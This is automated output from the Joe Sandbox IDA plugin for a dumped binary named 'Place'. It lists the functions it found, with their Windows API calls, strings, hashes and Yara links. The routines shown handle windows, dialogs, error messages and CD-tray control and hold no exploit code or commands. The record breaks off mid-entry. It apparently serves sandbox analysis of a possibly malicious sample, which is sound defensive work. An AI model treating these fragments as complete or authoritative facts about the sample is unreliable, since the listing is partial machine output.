Instruction Fuzzy Hash: 57A1E371204307EBEB24DF68C884BAABBAAFF44314F10851BF999C2251DB30E955CB90

Function 005DBA6D Relevance: 26.5, APIs: 13, Strings: 2, Instructions: 249COMMON

Download Yara Rule

APIs

GetClassNameW.USER32(00000008,?,00000400), ref: 005DBAB1
_wcscmp.LIBCMT ref: 005DBAC2
GetWindowTextW.USER32(00000001,?,00000400), ref: 005DBAEA
CharUpperBuffW.USER32(?,00000000), ref: 005DBB07
_wcscmp.LIBCMT ref: 005DBB25
_wcsstr.LIBCMT ref: 005DBB36
GetClassNameW.USER32(00000018,?,00000400), ref: 005DBB6E
_wcscmp.LIBCMT ref: 005DBB7E
GetWindowTextW.USER32(00000002,?,00000400), ref: 005DBBA5
GetClassNameW.USER32(00000018,?,00000400), ref: 005DBBEE
_wcscmp.LIBCMT ref: 005DBBFE
GetClassNameW.USER32(00000010,?,00000400), ref: 005DBC26
GetWindowRect.USER32(00000004,?), ref: 005DBC8F

Strings

ThumbnailClass, xrefs: 005DBB79, 005DBBF9
@, xrefs: 005DBA92

Memory Dump Source

Source File: 0000000B.00000002.2708371845.0000000000581000.00000020.00000001.01000000.00000007.sdmp, Offset: 00580000, based on PE: true

Associated: 0000000B.00000002.2708352257.0000000000580000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000610000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000636000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708464707.0000000000640000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708482839.0000000000649000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_580000_Place.jbxd

Similarity

API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
String ID: @$ThumbnailClass
API String ID: 1788623398-1539354611
Opcode ID: b1c3fc8619e4121ac039d391d17ed937e5b8b9d7ae0ae10b27383414f1e24d3a
Instruction ID: 81e8af727b8120ee7c9e0675f7812f063e5227d84a53e6062db1b30e2226c5ef
Opcode Fuzzy Hash: b1c3fc8619e4121ac039d391d17ed937e5b8b9d7ae0ae10b27383414f1e24d3a
Instruction Fuzzy Hash: DF815E71004206DBEB24DF18C885FAA7FEAFB84314F05856BFD859A1A6DB30DE45CB61

Function 005DB8B6 Relevance: 26.4, APIs: 3, Strings: 12, Instructions: 105COMMON

Download Yara Rule

APIs

__wcsnicmp.LIBCMT ref: 005DB915

Strings

[ACTIVE, xrefs: 005DB902
ACTIVE, xrefs: 005DB8F0
[LAST, xrefs: 005DB9C2
[CLASS:, xrefs: 005DB965
[ALL, xrefs: 005DB9BB
CLASSNAME=, xrefs: 005DB952
HANDLE=, xrefs: 005DB90E
REGEXP=, xrefs: 005DB92A
ALL, xrefs: 005DB9A9
[REGEXPTITLE:, xrefs: 005DB93D
LAST, xrefs: 005DB8DA
[HANDLE:, xrefs: 005DB921

Memory Dump Source

Source File: 0000000B.00000002.2708371845.0000000000581000.00000020.00000001.01000000.00000007.sdmp, Offset: 00580000, based on PE: true

Associated: 0000000B.00000002.2708352257.0000000000580000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000610000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000636000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708464707.0000000000640000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708482839.0000000000649000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_580000_Place.jbxd

Similarity

API ID: __wcsnicmp
String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
API String ID: 1038674560-1810252412
Opcode ID: 208bbac2d36553143cc3df4ea67c277981aff2a7fe103d710b5fbc967b8ea20c
Instruction ID: 22d0a0cc12d5f26289e00b1645698731241086969575c5e857e82bce58f20391
Opcode Fuzzy Hash: 208bbac2d36553143cc3df4ea67c277981aff2a7fe103d710b5fbc967b8ea20c
Instruction Fuzzy Hash: 41310230A40617E6EF20EBA0CD57EAD7BB6BF61350F620527F581B11D1EF516E00D686

Function 005DCB97 Relevance: 25.7, APIs: 17, Instructions: 169windowtimeCOMMON

Download Yara Rule

APIs

LoadIconW.USER32(00000063), ref: 005DCBAA
SendMessageW.USER32(?,00000080,00000000,00000000), ref: 005DCBBC
SetWindowTextW.USER32(?,?), ref: 005DCBD3
GetDlgItem.USER32(?,000003EA), ref: 005DCBE8
SetWindowTextW.USER32(00000000,?), ref: 005DCBEE
GetDlgItem.USER32(?,000003E9), ref: 005DCBFE
SetWindowTextW.USER32(00000000,?), ref: 005DCC04
SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 005DCC25
SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 005DCC3F
GetWindowRect.USER32(?,?), ref: 005DCC48
SetWindowTextW.USER32(?,?), ref: 005DCCB3
GetDesktopWindow.USER32 ref: 005DCCB9
GetWindowRect.USER32(00000000), ref: 005DCCC0
MoveWindow.USER32(?,?,?,?,00000000,00000000), ref: 005DCD0C
GetClientRect.USER32(?,?), ref: 005DCD19
PostMessageW.USER32(?,00000005,00000000,00000000), ref: 005DCD3E
SetTimer.USER32(?,0000040A,00000000,00000000), ref: 005DCD69

Memory Dump Source

Source File: 0000000B.00000002.2708371845.0000000000581000.00000020.00000001.01000000.00000007.sdmp, Offset: 00580000, based on PE: true

Associated: 0000000B.00000002.2708352257.0000000000580000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000610000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000636000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708464707.0000000000640000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708482839.0000000000649000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_580000_Place.jbxd

Similarity

API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
String ID:
API String ID: 3869813825-0
Opcode ID: 706fdc3943c34560a773ef74a86da1cefd8f0368f31b6a5fddec7d3233004f94
Instruction ID: 08995eb9fb5981d218a9da0629a5a6a9e8ee78b86931d94c7243976514bc4811
Opcode Fuzzy Hash: 706fdc3943c34560a773ef74a86da1cefd8f0368f31b6a5fddec7d3233004f94
Instruction Fuzzy Hash: D9515F3090070AAFEB309FA8CD89BAEBFB5FF44705F00451AE656A26A0C775A954CB50

Function 0060A7DE Relevance: 24.7, APIs: 12, Strings: 2, Instructions: 205windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0060A87E
DestroyWindow.USER32(00000000,?), ref: 0060A8F8

Part of subcall function 00591821: _memmove.LIBCMT ref: 0059185B

CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 0060A972
SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 0060A994
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0060A9A7
DestroyWindow.USER32(00000000), ref: 0060A9C9
CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00580000,00000000), ref: 0060AA00
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0060AA19
GetDesktopWindow.USER32 ref: 0060AA32
GetWindowRect.USER32(00000000), ref: 0060AA39
SendMessageW.USER32(00000000,00000418,00000000,?), ref: 0060AA51
SendMessageW.USER32(00000000,00000421,?,00000000), ref: 0060AA69

Part of subcall function 005829AB: GetWindowLongW.USER32(?,000000EB), ref: 005829BC

Strings

0, xrefs: 0060A894
tooltips_class32, xrefs: 0060A96B, 0060A9F9

Memory Dump Source

Source File: 0000000B.00000002.2708371845.0000000000581000.00000020.00000001.01000000.00000007.sdmp, Offset: 00580000, based on PE: true

Associated: 0000000B.00000002.2708352257.0000000000580000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000610000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000636000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708464707.0000000000640000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708482839.0000000000649000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_580000_Place.jbxd

Similarity

API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memmove_memset
String ID: 0$tooltips_class32
API String ID: 1297703922-3619404913
Opcode ID: 734adf545cbba18afa14eee25cca2deec5c3549ea2a557828102d84d74791f67
Instruction ID: c5fc1f3269518d44a964ad15340d294afceb2cb204a136e6c8574fd8f092d957
Opcode Fuzzy Hash: 734adf545cbba18afa14eee25cca2deec5c3549ea2a557828102d84d74791f67
Instruction Fuzzy Hash: B0718B70290305AFEB25CF68CC49FAB7BE6FB89344F084519F985873A1D770A941DB92

Function 0060CCA6 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 181windowfileCOMMON

Download Yara Rule

APIs

Part of subcall function 005829E2: GetWindowLongW.USER32(?,000000EB), ref: 005829F3

DragQueryPoint.SHELL32(?,?), ref: 0060CCCF

Part of subcall function 0060B1A9: ClientToScreen.USER32(?,?), ref: 0060B1D2
Part of subcall function 0060B1A9: GetWindowRect.USER32(?,?), ref: 0060B248
Part of subcall function 0060B1A9: PtInRect.USER32(?,?,0060C6BC), ref: 0060B258

SendMessageW.USER32(?,000000B0,?,?), ref: 0060CD38
DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 0060CD43
DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 0060CD66
_wcscat.LIBCMT ref: 0060CD96
SendMessageW.USER32(?,000000C2,00000001,?), ref: 0060CDAD
SendMessageW.USER32(?,000000B0,?,?), ref: 0060CDC6
SendMessageW.USER32(?,000000B1,?,?), ref: 0060CDDD
SendMessageW.USER32(?,000000B1,?,?), ref: 0060CDFF
DragFinish.SHELL32(?), ref: 0060CE06
DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 0060CEF9

Strings

@GUI_DRAGID, xrefs: 0060CE71
@GUI_DROPID, xrefs: 0060CE26
@GUI_DRAGFILE, xrefs: 0060CEA8

Memory Dump Source

Source File: 0000000B.00000002.2708371845.0000000000581000.00000020.00000001.01000000.00000007.sdmp, Offset: 00580000, based on PE: true

Associated: 0000000B.00000002.2708352257.0000000000580000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000610000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000636000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708464707.0000000000640000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708482839.0000000000649000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_580000_Place.jbxd

Similarity

API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen_wcscat
String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
API String ID: 169749273-3440237614
Opcode ID: 3ce6d586678f3502f028c0d266c0c456a10f3066a6806f3abbb00ad66cdbddff
Instruction ID: 7153cb6673aae928b30175d670330828c1646c0c4111d698a43a89f8633bddbc
Opcode Fuzzy Hash: 3ce6d586678f3502f028c0d266c0c456a10f3066a6806f3abbb00ad66cdbddff
Instruction Fuzzy Hash: B3612A71108301AFD705EF54DC89D9BBFEAFBC9750F000A2EF595921A1DB709A49CB92

Function 005E82D5 Relevance: 23.1, APIs: 11, Strings: 2, Instructions: 378timeCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(00000000), ref: 005E831A
VariantCopy.OLEAUT32(00000000,?), ref: 005E8323
VariantClear.OLEAUT32(00000000), ref: 005E832F
VariantTimeToSystemTime.OLEAUT32(?,?,?), ref: 005E841D
__swprintf.LIBCMT ref: 005E844D
VarR8FromDec.OLEAUT32(?,?), ref: 005E8479
VariantInit.OLEAUT32(?), ref: 005E852A
SysFreeString.OLEAUT32(?), ref: 005E85BE
VariantClear.OLEAUT32(?), ref: 005E8618
VariantClear.OLEAUT32(?), ref: 005E8627
VariantInit.OLEAUT32(00000000), ref: 005E8665

Strings

%4d%02d%02d%02d%02d%02d, xrefs: 005E8447
Default, xrefs: 005E84DA

Memory Dump Source

Source File: 0000000B.00000002.2708371845.0000000000581000.00000020.00000001.01000000.00000007.sdmp, Offset: 00580000, based on PE: true

Associated: 0000000B.00000002.2708352257.0000000000580000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000610000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000636000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708464707.0000000000640000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708482839.0000000000649000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_580000_Place.jbxd

Similarity

API ID: Variant$ClearInit$Time$CopyFreeFromStringSystem__swprintf
String ID: %4d%02d%02d%02d%02d%02d$Default
API String ID: 3730832054-3931177956
Opcode ID: 8b29916f086c829638f9b113bfee32602f7155a65da8efdcd5699a3967ffd262
Instruction ID: 47bac16591b188e690779d741748e7eb37548b80dce9f342d27a7a738bef6244
Opcode Fuzzy Hash: 8b29916f086c829638f9b113bfee32602f7155a65da8efdcd5699a3967ffd262
Instruction Fuzzy Hash: 57D1BF71604556EBDF289F62C888B7EBFB4FF49700F148956E489AB280DF70AC40DB91

Function 006049CF Relevance: 23.0, APIs: 2, Strings: 11, Instructions: 251windowCOMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?), ref: 00604A61
SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00604AAC

Strings

COLLAPSE, xrefs: 00604AF2
GETSELECTED, xrefs: 00604BBC
CHECK, xrefs: 00604ACC
GETITEMCOUNT, xrefs: 00604B8E
ISCHECKED, xrefs: 00604C2F
UNCHECK, xrefs: 00604C88
GETTEXT, xrefs: 00604BFF
EXPAND, xrefs: 00604B5E
SELECT, xrefs: 00604C5D
GETTOTALCOUNT, xrefs: 00604A93
EXISTS, xrefs: 00604B15

Memory Dump Source

Source File: 0000000B.00000002.2708371845.0000000000581000.00000020.00000001.01000000.00000007.sdmp, Offset: 00580000, based on PE: true

Associated: 0000000B.00000002.2708352257.0000000000580000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000610000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000636000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708464707.0000000000640000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708482839.0000000000649000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_580000_Place.jbxd

Similarity

API ID: BuffCharMessageSendUpper
String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
API String ID: 3974292440-4258414348
Opcode ID: 0738279ac5462426eab3fb6e5efb0aa31eb4cd572405527f677fc7cbce8166f9
Instruction ID: 76dab6f3b6dfd9871607f81c84fb65431ea9e3174afcb5e435b5eefc4f1b1630
Opcode Fuzzy Hash: 0738279ac5462426eab3fb6e5efb0aa31eb4cd572405527f677fc7cbce8166f9
Instruction Fuzzy Hash: E8915D742446129BCB18EF20C455A6ABBA2BF94354F108859FD966B3E2DF30ED46CB81

Function 005EE25D Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 185timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32(?), ref: 005EE31F
SystemTimeToFileTime.KERNEL32(?,?), ref: 005EE32F
LocalFileTimeToFileTime.KERNEL32(?,?), ref: 005EE33B
__wsplitpath.LIBCMT ref: 005EE399
_wcscat.LIBCMT ref: 005EE3B1
_wcscat.LIBCMT ref: 005EE3C3
GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 005EE3D8
SetCurrentDirectoryW.KERNEL32(?), ref: 005EE3EC
SetCurrentDirectoryW.KERNEL32(?), ref: 005EE41E
SetCurrentDirectoryW.KERNEL32(?), ref: 005EE43F
_wcscpy.LIBCMT ref: 005EE44B
SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 005EE48A

Strings

*.*, xrefs: 005EE445

Memory Dump Source

Source File: 0000000B.00000002.2708371845.0000000000581000.00000020.00000001.01000000.00000007.sdmp, Offset: 00580000, based on PE: true

Associated: 0000000B.00000002.2708352257.0000000000580000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000610000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000636000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708464707.0000000000640000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708482839.0000000000649000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_580000_Place.jbxd

Similarity

API ID: CurrentDirectoryTime$File$Local_wcscat$System__wsplitpath_wcscpy
String ID: *.*
API String ID: 3566783562-438819550
Opcode ID: 2160dc4a903414b313e67e48206aaef7a372d869e13fd0814b066f44c362d07b
Instruction ID: c4ffced635583be3716ceb46f1e6f25bbbc0c4295e527a5729871d1a590d0279
Opcode Fuzzy Hash: 2160dc4a903414b313e67e48206aaef7a372d869e13fd0814b066f44c362d07b
Instruction Fuzzy Hash: CB61A9725143469FCB14EF60C84999EBBE8FF88310F04891EF989D7251EB31EA45CB92

Function 005823F7 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 170timeCOMMON

Download Yara Rule

APIs

Part of subcall function 00581F1D: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00582412,?,00000000,?,?,?,?,00581AA7,00000000,?), ref: 00581F76

DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 005824AF
KillTimer.USER32(-00000001,?,?,?,?,00581AA7,00000000,?,?,00581EBE,?,?), ref: 0058254A
DestroyAcceleratorTable.USER32(00000000), ref: 005BBFE7
ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00581AA7,00000000,?,?,00581EBE,?,?), ref: 005BC018
ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00581AA7,00000000,?,?,00581EBE,?,?), ref: 005BC02F
ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00581AA7,00000000,?,?,00581EBE,?,?), ref: 005BC04B
DeleteObject.GDI32(00000000), ref: 005BC05D

Strings

ha, xrefs: 0058256F

Memory Dump Source

Source File: 0000000B.00000002.2708371845.0000000000581000.00000020.00000001.01000000.00000007.sdmp, Offset: 00580000, based on PE: true

Associated: 0000000B.00000002.2708352257.0000000000580000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000610000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000636000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708464707.0000000000640000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708482839.0000000000649000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_580000_Place.jbxd

Similarity

API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
String ID: ha
API String ID: 641708696-1391634701
Opcode ID: bf477a4b33d58d5a1a0232c2155a200fafc33c614c224cb52d6b111653639ca0
Instruction ID: 6ea69e21c099bf359f5d7ac6458433877d322e6d33b0a9187dfe9e2e52d22100
Opcode Fuzzy Hash: bf477a4b33d58d5a1a0232c2155a200fafc33c614c224cb52d6b111653639ca0
Instruction Fuzzy Hash: D661BB34104605DFDB25EF14D94CB6A7FF2FB45312F14A929E8526AAB0C3B1B880DFA4

Function 005EA48D Relevance: 22.9, APIs: 7, Strings: 6, Instructions: 156COMMON

Download Yara Rule

APIs

LoadStringW.USER32(00000066,?,00000FFF,?), ref: 005EA4D4

Part of subcall function 00591A36: _memmove.LIBCMT ref: 00591A77

LoadStringW.USER32(?,?,00000FFF,?), ref: 005EA4F6
__swprintf.LIBCMT ref: 005EA54F
__swprintf.LIBCMT ref: 005EA568
_wprintf.LIBCMT ref: 005EA61E
_wprintf.LIBCMT ref: 005EA63C

Strings

"%s" (%d) : ==> %s:%s%s, xrefs: 005EA619
Error: , xrefs: 005EA5E6
_5Y, xrefs: 005EA4A1
^ ERROR, xrefs: 005EA5C0
Line %d (File "%s"):, xrefs: 005EA549, 005EA562
"%s" (%d) : ==> %s:, xrefs: 005EA637

Memory Dump Source

Source File: 0000000B.00000002.2708371845.0000000000581000.00000020.00000001.01000000.00000007.sdmp, Offset: 00580000, based on PE: true

Associated: 0000000B.00000002.2708352257.0000000000580000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000610000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000636000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708464707.0000000000640000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708482839.0000000000649000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_580000_Place.jbxd

Similarity

API ID: LoadString__swprintf_wprintf$_memmove
String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR$_5Y
API String ID: 311963372-1037767037
Opcode ID: 0188346a26a159b5fab154df3405a415312b25418b5ebaee0caeb1e77d0db631
Instruction ID: 13dc2dffbbc3ca6a68b904fb2c41c7eadc9b5eb2ce7904a39a7a650a36981472
Opcode Fuzzy Hash: 0188346a26a159b5fab154df3405a415312b25418b5ebaee0caeb1e77d0db631
Instruction Fuzzy Hash: 2951807180051BAACF19EBE0CD4AEEEBB79BF45340F104165F505A20A2EB316F58DB95

Function 005EA27B Relevance: 22.9, APIs: 7, Strings: 6, Instructions: 150COMMON

Download Yara Rule

APIs

LoadStringW.USER32(00000066,?,00000FFF,?), ref: 005EA2C2

Part of subcall function 00591A36: _memmove.LIBCMT ref: 00591A77

LoadStringW.USER32(00000072,?,00000FFF,?), ref: 005EA2E3
__swprintf.LIBCMT ref: 005EA33C
__swprintf.LIBCMT ref: 005EA355
_wprintf.LIBCMT ref: 005EA3FC
_wprintf.LIBCMT ref: 005EA41A

Strings

^ ERROR , xrefs: 005EA391
"%s" (%d) : ==> %s:%s%s, xrefs: 005EA3F7
Error: , xrefs: 005EA3C4
Line %d (File "%s"):, xrefs: 005EA336, 005EA34F
Incorrect parameters to object property !, xrefs: 005EA39E
"%s" (%d) : ==> %s:, xrefs: 005EA415

Memory Dump Source

Source File: 0000000B.00000002.2708371845.0000000000581000.00000020.00000001.01000000.00000007.sdmp, Offset: 00580000, based on PE: true

Associated: 0000000B.00000002.2708352257.0000000000580000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000610000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000636000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708464707.0000000000640000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708482839.0000000000649000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_580000_Place.jbxd

Similarity

API ID: LoadString__swprintf_wprintf$_memmove
String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Incorrect parameters to object property !$Line %d (File "%s"):$^ ERROR
API String ID: 311963372-3080491070
Opcode ID: 913bfde7c8ccf3685e8ca58a29f7dbe11b3ae982dda336c757a5d87c342e4e19
Instruction ID: b441e48587e667ec5bdc04c140c78cfa832c510ab055429ccc482e329203f8e6
Opcode Fuzzy Hash: 913bfde7c8ccf3685e8ca58a29f7dbe11b3ae982dda336c757a5d87c342e4e19
Instruction Fuzzy Hash: 8C519F7190051BAACF18EBF0CD4AEEEBB79BF44340F500165F505A20A2EB752F58DBA5

Function 005E0065 Relevance: 22.9, APIs: 8, Strings: 5, Instructions: 138windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000000,00000001,00000000,?,005CF8B8,00000001,0000138C,00000001,00000000,00000001,?,005F3FF9,00000000), ref: 005E009A
LoadStringW.USER32(00000000,?,005CF8B8,00000001), ref: 005E00A3

Part of subcall function 00591A36: _memmove.LIBCMT ref: 00591A77

GetModuleHandleW.KERNEL32(00000000,00647310,?,00000FFF,?,?,005CF8B8,00000001,0000138C,00000001,00000000,00000001,?,005F3FF9,00000000,00000001), ref: 005E00C5
LoadStringW.USER32(00000000,?,005CF8B8,00000001), ref: 005E00C8
__swprintf.LIBCMT ref: 005E0118
__swprintf.LIBCMT ref: 005E0129
_wprintf.LIBCMT ref: 005E01D2
MessageBoxW.USER32(00000000,?,?,00011010), ref: 005E01E9

Strings

Line %d:, xrefs: 005E0123
Error: , xrefs: 005E01A0
^ ERROR, xrefs: 005E017E
Line %d (File "%s"):, xrefs: 005E0112
%s (%d) : ==> %s: %s %s, xrefs: 005E01CD

Memory Dump Source

Source File: 0000000B.00000002.2708371845.0000000000581000.00000020.00000001.01000000.00000007.sdmp, Offset: 00580000, based on PE: true

Associated: 0000000B.00000002.2708352257.0000000000580000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000610000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000636000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708464707.0000000000640000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708482839.0000000000649000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_580000_Place.jbxd

Similarity

API ID: HandleLoadModuleString__swprintf$Message_memmove_wprintf
String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
API String ID: 984253442-2268648507
Opcode ID: 0768b5b42889ec22a26789176be2e859362972b6f7a02b37c834a1734c616ee3
Instruction ID: e1b727d56bffaf2f31fb19e08f4b56e81a79b21a363225fcb083af12a36b72fa
Opcode Fuzzy Hash: 0768b5b42889ec22a26789176be2e859362972b6f7a02b37c834a1734c616ee3
Instruction Fuzzy Hash: 20416F7284052BAACF18EBE0CD8ADEE7B7DBF94340F500165F501B2092DB746F49DAA5

Function 005EA995 Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 138COMMON

Download Yara Rule

APIs

Part of subcall function 00584D37: __itow.LIBCMT ref: 00584D62
Part of subcall function 00584D37: __swprintf.LIBCMT ref: 00584DAC

CharLowerBuffW.USER32(?,?), ref: 005EAA0E
GetDriveTypeW.KERNEL32 ref: 005EAA5B
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 005EAAA3
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 005EAADA
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 005EAB08

Part of subcall function 00591821: _memmove.LIBCMT ref: 0059185B

Strings

open , xrefs: 005EAA6A
wait, xrefs: 005EAAC5
close cd wait, xrefs: 005EAAF3
type cdaudio alias cd wait, xrefs: 005EAA86
close, xrefs: 005EAA14
closed, xrefs: 005EAA22, 005EAA2B
set cd door , xrefs: 005EAAA9
open, xrefs: 005EAA35

Memory Dump Source

Source File: 0000000B.00000002.2708371845.0000000000581000.00000020.00000001.01000000.00000007.sdmp, Offset: 00580000, based on PE: true

Associated: 0000000B.00000002.2708352257.0000000000580000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000610000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000636000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708464707.0000000000640000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708482839.0000000000649000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_580000_Place.jbxd

Similarity

API ID: SendString$BuffCharDriveLowerType__itow__swprintf_memmove
String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
API String ID: 2698844021-4113822522
Opcode ID: 14721660dcfe1b55f181ad28c0c0b9594c23d292169b8d446a01a66bf421feee
